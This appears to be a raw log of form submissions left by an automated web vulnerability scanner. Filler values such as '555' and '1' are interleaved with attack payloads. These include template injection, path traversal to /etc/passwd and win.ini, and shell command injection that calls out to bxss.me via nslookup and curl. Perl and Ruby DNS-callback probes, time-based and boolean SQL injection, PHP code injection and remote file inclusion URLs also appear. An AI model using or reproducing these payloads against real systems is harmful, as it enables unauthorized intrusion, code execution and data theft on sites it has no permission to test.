555
1
555
1
555
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
1
555
1
555
1
dfb{{98991*97996}}xca
dfb{{98991*97996}}xca
555
1
dfb[[${98991*97996}]]xca
dfb[[${98991*97996}]]xca
555
1
dfb__${98991*97996}__::.x
dfb__${98991*97996}__::.x
555
1
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
1
555
1
555
1
555
1
555
1DnfNlyiO
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
1YFQcQNAO
1
555
1
555
1
555
1
555
response.write(9760130*9136501)
555
1
555
1
555
1
555
'+response.write(9760130*9136501)+'
555
1
555
"+response.write(9760130*9136501)+"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
redirtest.acx
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
1
response.write(9831528*9460678)
1
555
file:///etc/passwd
555
1
'+response.write(9831528*9460678)+'
1
555
1
555
1
555
1
"+response.write(9831528*9460678)+"
../1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo gjklte$()\ wxfovr\nz^xyu||a #' &echo gjklte$()\ wxfovr\nz^xyu||a #|" &echo gjklte$()\ wxfovr\nz
555
&echo bzhyoy$()\ ahpagk\nz^xyu||a #' &echo bzhyoy$()\ ahpagk\nz^xyu||a #|" &echo bzhyoy$()\ ahpagk\n
555
1
555
1
555
1
555
1&echo mmhnpf$()\ sffith\nz^xyu||a #' &echo mmhnpf$()\ sffith\nz^xyu||a #|" &echo mmhnpf$()\ sffith\
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
|echo itlzic$()\ szrrcw\nz^xyu||a #' |echo itlzic$()\ szrrcw\nz^xyu||a #|" |echo itlzic$()\ szrrcw\n
555
1
555
1
)
1|echo ozqgip$()\ cmxqqu\nz^xyu||a #' |echo ozqgip$()\ cmxqqu\nz^xyu||a #|" |echo ozqgip$()\ cmxqqu\
555
1
555
1
555
1
555
expr 9000124621 - 939607
555
1
555
1
555
1
555
1
!(()&&!|*|*|
(nslookup -q=cname hitzxgcicecqpcf773.bxss.me||curl hitzxgcicecqpcf773.bxss.me))
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hitbnqjjgezeia205c.bxss.me||curl hitbnqjjgezeia205c.bxss.me)
555
1
555
1
555
1
555
555
&nslookup -q=cname hitgiuhcyjyng4c85a.bxss.me&'\"`0&nslookup -q=cname hitgiuhcyjyng4c85a.bxss.me&`'
555
1
555
1
555
1
555
1
555
&(nslookup -q=cname hitaxtpimqvzv0a42a.bxss.me||curl hitaxtpimqvzv0a42a.bxss.me)&'\"`0&(nslookup -q=
555
1
555
1
555
1
555
|(nslookup -q=cname hitejorffoswce2f65.bxss.me||curl hitejorffoswce2f65.bxss.me)
555
1
555
1
555
555
`(nslookup -q=cname hitiamcrwtetvd6dd9.bxss.me||curl hitiamcrwtetvd6dd9.bxss.me)`
555
1
555
1
555
1
555
1
555
;(nslookup -q=cname hitxvyxdzbflr7520c.bxss.me||curl hitxvyxdzbflr7520c.bxss.me)|(nslookup -q=cname
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitbnbdjcwqln7e1b3.bxss.me||curl${IFS}hitbnbdjcwqln7e1b3.bxss.me)
555
555
1
555
1
555
'"()
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitixciecirel546ed.bxss.me||curl${IFS}hitixciecirel546ed.bxss.me)
555
1
555
1
555
1
555
1'&&sleep(27*1000)*ntlcqs&&'
555
1
555
1
555
1
555
1"&&sleep(27*1000)*hivksl&&"
555
1
555
1
555
1
555
1'||sleep(27*1000)*dtgbsb||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*dnizqb||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
1
555
1
555
1
555
1
555
Http://bxss.me/t/fit.txt
555
1
555
1
555
1
555
http://bxss.me/t/fit.txt%3F.jpg
555
1
555
1
555
1
555
/etc/shells
555
1
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
c:/windows/win.ini
555
1
555
1
555
1
555
bxss.me
555
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555
1
file:///etc/passwd
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
../555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'.gethostbyname(lc('hitxt'.'mefojwomc2109.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(68).chr
555
1
555
1
555
".gethostbyname(lc("hitih"."gkwftzbd40e93.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(71).ch
555
gethostbyname(lc('hituw'.'exuuslfl64722.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(88).chr(
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
1
555
1
555
1
555
1
555
1
1
555
1
555
1
1aNG2BWhj
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
1
555
1
555
1
555
1
'"()
-1 OR 2+65-65-1=0+0+0+1 --
555
1
555
1
555
1
555
1
555'&&sleep(27*1000)*skbrtr&&'
-1 OR 2+97-97-1=0+0+0+1
555
1
'.gethostbyname(lc('hitty'.'yxsvspzwb5296.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(67).chr(122).chr(67).'
1
555
1
555
1
555"&&sleep(27*1000)*dirwhi&&"
1
".gethostbyname(lc("hitfa"."opfzrtbh06186.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(86).chr(107).chr(90)."
1
555
-1' OR 2+954-954-1=0+0+0+1 --
555
1
555
1
555'||sleep(27*1000)*tamrvt||'
1
gethostbyname(lc('hitfb'.'iyarwodi98961.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(65).chr(114).chr(66)
1
555
-1' OR 2+68-68-1=0+0+0+1 or '5Vc4YndC'='
555
1
555
1
555"||sleep(27*1000)*hlipia||"
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
-1" OR 2+709-709-1=0+0+0+1 --
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
555
1
echo nzieav$()\ kxpwyp\nz^xyu||a #' &echo nzieav$()\ kxpwyp\nz^xyu||a #|" &echo nzieav$()\ kxpwyp\nz^xyu||a #
1
Http://bxss.me/t/fit.txt
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
&echo hxpcgz$()\ aihnrj\nz^xyu||a #' &echo hxpcgz$()\ aihnrj\nz^xyu||a #|" &echo hxpcgz$()\ aihnrj\nz^xyu||a #
1
555
1
http://bxss.me/t/fit.txt%3F.jpg
1
555
1
555&echo ypxowr$()\ uwibed\nz^xyu||a #' &echo ypxowr$()\ uwibed\nz^xyu||a #|" &echo ypxowr$()\ uwibed\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
555
1
555
1
/etc/shells
bxss.me/t/xss.html?%00
555
1
|echo uggsmn$()\ ncbtoi\nz^xyu||a #' |echo uggsmn$()\ ncbtoi\nz^xyu||a #|" |echo uggsmn$()\ ncbtoi\nz^xyu||a #
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555|echo ojfnen$()\ oxsfpv\nz^xyu||a #' |echo ojfnen$()\ oxsfpv\nz^xyu||a #|" |echo ojfnen$()\ oxsfpv\nz^xyu||a #
1
../../../../../../../../../../../../../../etc/shells
1
555
1
expr 9000276241 - 950154
1
555
1
555
1
c:/windows/win.ini
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
(nslookup -q=cname hitdshykfuaxoa9847.bxss.me||curl hitdshykfuaxoa9847.bxss.me))
1
bxss.me
1
555
1
555
1
$(nslookup -q=cname hitxrplzwdohnc8bd8.bxss.me||curl hitxrplzwdohnc8bd8.bxss.me)
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(
555
1
555
1
&nslookup -q=cname hitulotbalphib622c.bxss.me&'\"`0&nslookup -q=cname hitulotbalphib622c.bxss.me&`'
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
1
&(nslookup -q=cname hitzocagthxhdf2e09.bxss.me||curl hitzocagthxhdf2e09.bxss.me)&'\"`0&(nslookup -q=cname hitzocagthxhdf2e09.bxss.me||curl hitzocagthxhdf2e09.bxss.me)&`'
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1-1 waitfor delay '0:0:15' --
555
1
|(nslookup -q=cname hitolrhskvcma0edba.bxss.me||curl hitolrhskvcma0edba.bxss.me)
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
HttP://bxss.me/t/xss.html?%00
1
`(nslookup -q=cname hitrppbnoxohb9c551.bxss.me||curl hitrppbnoxohb9c551.bxss.me)`
1
555
1
555
1
bxss.me/t/xss.html?%00
1w8Ijj2gw'; waitfor delay '0:0:15' --
555
';print(md5(31337));$a='
555
"+"A".concat(70-3).concat(22*4).concat(117).concat(69).concat(99).concat(79)+(require"socket"
Socket
555
1
;(nslookup -q=cname hitwmomgnbqupe2442.bxss.me||curl hitwmomgnbqupe2442.bxss.me)|(nslookup -q=cname hitwmomgnbqupe2442.bxss.me||curl hitwmomgnbqupe2442.bxss.me)&(nslookup -q=cname hitwmomgnbqupe2442.b
1
555
1-1 OR 708=(SELECT 708 FROM PG_SLEEP(15))--
555
";print(md5(31337));$a="
555
'+'A'.concat(70-3).concat(22*4).concat(115).concat(90).concat(110).concat(76)+(require'socket'
Socke
555
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitzmorbjigjcf24d1.bxss.me||curl${IFS}hitzmorbjigjcf24d1.bxss.me)
1
555
1-1) OR 492=(SELECT 492 FROM PG_SLEEP(15))--
555
${@print(md5(31337))}
555
'A'.concat(70-3).concat(22*4).concat(106).concat(67).concat(104).concat(84)+(require'socket'
Socket.
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hitfovylkgbeme7f4e.bxss.me||curl${IFS}hitfovylkgbeme7f4e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfovylkgbeme7f4e.bxss.me||curl${IFS}hitfovylkgbeme7f4e.bx
1
555
1-1)) OR 609=(SELECT 609 FROM PG_SLEEP(15))--
555
${@print(md5(31337))}\
555
1
555
1
555
'.print(md5(31337)).'
555
1
555
1
555
1
555
1
555
'"
555
1MvbFwcvl' OR 628=(SELECT 628 FROM PG_SLEEP(15))--
555
1
555
555
1
555
1w87SYvtw') OR 118=(SELECT 118 FROM PG_SLEEP(15))--
555
1
555
1
555
1
555
1
555
1sYgj3eHl')) OR 75=(SELECT 75 FROM PG_SLEEP(15))--
555
1
555
1
555
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
1
555
1
555
1
555
1
555
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
1
555
555
1
555
1
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
555
1
555
1
555
1
555
1'"
555
555
1????%2527%2522\'\"
555
1
555
1
555
1'"()&%
555
@@YlHY9
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(98).concat(72).concat(108).concat(78)+(require"socket"
Socket.gethostbyname("hiths"+"xyjmzvemfb17b.bxss.me.")[3].to_s)+"
1
555
1
'"
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(111).concat(76).concat(99).concat(85)+(require'socket'
Socket.gethostbyname('hityc'+'ldrgxjwf3db3a.bxss.me.')[3].to_s)+'
1
555
1
'"()&%
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(118).concat(77).concat(120).concat(80)+(require'socket'
Socket.gethostbyname('hitsa'+'qkgauuax3571c.bxss.me.')[3].to_s)
1
555
1
555
1
555
1
555
1
555
1
555
19514801
555
1
555
1
555
1
555
1
555
1
555
${9999113+10000103}
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
1
555
1
555
1
555
1
555
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'????
1
555
1
555
1
555
1
555
1
555
1
${9999376+10000145}
1
555
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
555
1
';print(md5(31337));$a='
1
555
1
";print(md5(31337));$a="
1
555
1
555
1
${@print(md5(31337))}
1
555
1
555
1
${@print(md5(31337))}\
1
555
1
555
1
'.print(md5(31337)).'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555'"()&%
1
555
1
555
1
'"()&%
1
555
1
5559744918
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555zKy1msUG
1
555
1
-1 OR 2+44-44-1=0+0+0+1 --
1
-1 OR 2+687-687-1=0+0+0+1
1
-1' OR 2+641-641-1=0+0+0+1 --
1
-1' OR 2+210-210-1=0+0+0+1 or 'Zl5zPXOt'='
1
-1" OR 2+852-852-1=0+0+0+1 --
1
555*if(now()=sysdate(),sleep(15),0)
1
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
1
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
1
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
555-1); waitfor delay '0:0:15' --
1
555-1 waitfor delay '0:0:15' --
1
555RUBMUHV6'; waitfor delay '0:0:15' --
1
555SuZMBiKj'; waitfor delay '0:0:6' --
1
5552Sz4N1uK'; waitfor delay '0:0:3' --
1
555-1 OR 156=(SELECT 156 FROM PG_SLEEP(15))--
1
555-1) OR 985=(SELECT 985 FROM PG_SLEEP(15))--
1
555-1)) OR 322=(SELECT 322 FROM PG_SLEEP(15))--
1
555tCqSfhwo' OR 91=(SELECT 91 FROM PG_SLEEP(15))--
1
555ph6rkrlo') OR 455=(SELECT 455 FROM PG_SLEEP(15))--
1
555bSikjlMn')) OR 632=(SELECT 632 FROM PG_SLEEP(15))--
1
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
555
1
555'"
1
555????%2527%2522\'\"
1
@@EiuiS